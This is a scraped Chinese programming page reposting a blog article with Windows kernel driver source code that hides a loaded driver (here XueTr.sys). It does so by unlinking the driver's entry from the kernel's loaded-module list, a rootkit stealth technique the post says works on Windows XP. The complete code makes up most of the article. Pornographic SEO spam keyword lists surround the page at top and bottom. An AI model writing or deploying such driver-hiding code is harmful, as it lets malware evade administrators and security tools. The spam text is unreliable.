日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

隐藏驱动模块(源码)

發布時間:2024/4/11 编程问答 17 豆豆
生活随笔 收集整理的這篇文章主要介紹了 隐藏驱动模块(源码) 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

XP親測有效,使用我們自己編寫的枚舉驅動模塊會看不到。枚舉驅動模塊請看文章?http://blog.csdn.net/liujiayu2/article/details/72822478

但是使用ARK工具依然能看到我們隱藏的驅動某塊,比如kernel detective 和PChunter 但是隱藏的驅動模塊為紅色,意為ARK工具檢測到了該模塊進行了隱藏


  • #include?<ntddk.h>??
  • ??
  • typedef?unsigned?long?DWORD;??
  • ??
  • typedef?struct?_KLDR_DATA_TABLE_ENTRY?{??
  • ????LIST_ENTRY?InLoadOrderLinks;??
  • ????PVOID?ExceptionTable;??
  • ????ULONG?ExceptionTableSize;??
  • ????PVOID?GpValue;??
  • ????DWORD?UnKnow;??
  • ????PVOID?DllBase;??
  • ????PVOID?EntryPoint;??
  • ????ULONG?SizeOfImage;??
  • ????UNICODE_STRING?FullDllName;??
  • ????UNICODE_STRING?BaseDllName;??
  • ????ULONG?Flags;??
  • ????USHORT?LoadCount;??
  • ????USHORT?__Unused5;??
  • ????PVOID?SectionPointer;??
  • ????ULONG?CheckSum;??
  • ????PVOID?LoadedImports;??
  • ????PVOID?PatchInformation;??
  • }?KLDR_DATA_TABLE_ENTRY,?*PKLDR_DATA_TABLE_ENTRY;??
  • ??
  • PDRIVER_OBJECT?pDriverObject?=?NULL;??
  • ??
  • VOID???
  • HideDriver()??
  • {??
  • ????PKLDR_DATA_TABLE_ENTRY?entry?=(PKLDR_DATA_TABLE_ENTRY)pDriverObject->DriverSection;??
  • ????PKLDR_DATA_TABLE_ENTRY?firstentry;??
  • ????UNICODE_STRING?uniDriverName;??
  • ??????
  • ????firstentry?=?entry;??
  • ??
  • ????//?初始化要隱藏驅動的驅動名??
  • ????RtlInitUnicodeString(&uniDriverName,?L"XueTr.sys");??
  • ??????
  • ????while((PKLDR_DATA_TABLE_ENTRY)entry->InLoadOrderLinks.Flink?!=?firstentry)??
  • ????{??
  • ????????if?(entry->FullDllName.Buffer?!=?0)??
  • ????????{??????
  • ????????????if?(RtlCompareUnicodeString(&uniDriverName,?&(entry->BaseDllName),?FALSE)?==?0)??
  • ????????????{??
  • ????????????????KdPrint(("隱藏驅動?%ws?成功!\n",?entry->BaseDllName.Buffer));??????
  • ????????????????//?修改?Flink?和?Blink?指針,?以跳過我們要隱藏的驅動??
  • ????????????????*((DWORD*)entry->InLoadOrderLinks.Blink)?=?(DWORD)entry->InLoadOrderLinks.Flink;??
  • ????????????????entry->InLoadOrderLinks.Flink->Blink?=?entry->InLoadOrderLinks.Blink;??
  • ??????????????????
  • ????????????????/*??
  • ????????????????????使被隱藏驅動LIST_ENTRY結構體的Flink,?Blink域指向自己?
  • ????????????????????因為此節點本來在鏈表中,?那么它鄰接的節點驅動被卸載時,??
  • ????????????????????系統會把此節點的Flink,?Blink域指向它相鄰節點的下一個節點.?
  • ????????????????????但是,?它此時已經脫離鏈表了,?如果現在它原本相鄰的節點驅動被?
  • ????????????????????卸載了,?那么此節點的Flink,?Blink域將有可能指向無用的地址,?而?
  • ????????????????????造成隨機性的BSoD.?
  • ????????????????*/??
  • ????????????????entry->InLoadOrderLinks.Flink?=?(LIST_ENTRY*)&(entry->InLoadOrderLinks.Flink);??
  • ????????????????entry->InLoadOrderLinks.Blink?=?(LIST_ENTRY*)&(entry->InLoadOrderLinks.Flink);??
  • ??
  • ????????????????break;??
  • ????????????}??
  • ????????}??
  • ????????//?鏈表往前走??
  • ????????entry?=?(PKLDR_DATA_TABLE_ENTRY)entry->InLoadOrderLinks.Flink;??
  • ????}??
  • }??
  • ??
  • NTSTATUS???
  • UnloadDriver(??
  • ?????????????IN?PDRIVER_OBJECT?DriverObject??
  • ?????????????)??
  • {??
  • ????return?STATUS_SUCCESS;??
  • }??
  • ??
  • NTSTATUS???
  • DriverEntry(??
  • ????????????IN?PDRIVER_OBJECT?DriverObject,???
  • ????????????IN?PUNICODE_STRING??RegistryPath??
  • ????????????)??
  • {??
  • ????DriverObject->DriverUnload?=?UnloadDriver;??
  • ????pDriverObject?=?DriverObject;??
  • ????HideDriver();??
  • ????return?STATUS_SUCCESS;??
  • }?

  • 總結

    以上是生活随笔為你收集整理的隐藏驱动模块(源码)的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

    主站蜘蛛池模板: 国产精品xxxx喷水欧美 | 欧美s码亚洲码精品m码 | 健身教练巨大粗爽gay视频 | 亚洲精品黄色 | 欧美一区三区三区高中清蜜桃 | 欧美日韩一区二区三区免费 | 久久免费国产视频 | 越南a级片 | 欧美67194 | av免费观看网址 | 亚洲国产精品免费视频 | 日韩三区视频 | 日韩熟妇一区二区三区 | 国产真人无码作爱视频免费 | 久久888| 欧美专区第二页 | 精品欧美乱码久久久久久 | 日韩欧美亚洲在线 | 色九九九| 精品成人免费一区二区在线播放 | 色啦啦视频 | 一二三区精品视频 | 国产卡一卡二 | 中文字幕在线视频播放 | 男女黄色录像 | 欧美大浪妇猛交饥渴大叫 | 成人黄色片免费 | 91视频一区二区三区 | 手机看片国产1024 | 亚洲影视在线观看 | 久久精品综合视频 | 成人午夜激情网 | 亚欧洲精品在线视频 | 国产精品资源网站 | 91黄色免费观看 | 天天欲色| 日韩欧美高清在线视频 | 久久久久久久美女 | 日本东京热一区二区三区 | 成人性生生活性生交全黄 | 国模精品视频一区二区 | 邪恶久久| 深夜毛片 | 一级性毛片 | 好吊操视频这里只有精品 | 久久看片 | 全部孕妇毛片丰满孕妇孕交 | 免费视频网站在线观看入口 | 日本少妇毛茸茸高潮 | 日韩精品在线播放 | 中国少妇无码专区 | av网站大全在线观看 | 久久亚洲av午夜福利精品一区 | 亚洲av永久无码精品一区二区国产 | wwwww国产 | 丰满人妻在公车被猛烈进入电影 | 国产精品国产 | 欧美bdsm调教视频 | 神秘马戏团在线观看免费高清中文 | 国产高清一区二区三区 | 538精品一线 | 久久曰视频| 亚洲欧美日韩国产一区二区 | 国产一区二区三区四 | 国内精品偷拍视频 | 黑人大群体交免费视频 | 狠狠人妻久久久久久综合麻豆 | 中国免费黄色片 | 黄色一级片免费在线观看 | 久久国产三级 | 中文字幕一区二区三区又粗 | 日本a级片免费 | 小嫩女直喷白浆 | 免费精品在线视频 | 成人免费看片98 | 天天操天天操 | 欧美亚洲在线视频 | 久久这里只有精品8 | 可以在线看黄的网站 | 成人在线免费小视频 | 色男人天堂av | 日本国产在线播放 | h片观看| 中文在线一区二区三区 | 中文字幕人成乱码熟女香港 | 黄色一级视频网站 | 口爆吞精一区二区三区 | 亚洲美免无码中文字幕在线 | 日本a级片在线播放 | 蓝牛av | 蜜桃av噜噜一区二区三区小说 | 亚洲石原莉奈一区二区在线观看 | 激情网页 | 老头巨大又粗又长xxxxx | 中文字幕在线观看视频免费 | 成人免费版欧美州 | 久久99精品久久久久 | 理论片中文字幕 | 2018国产大陆天天弄 |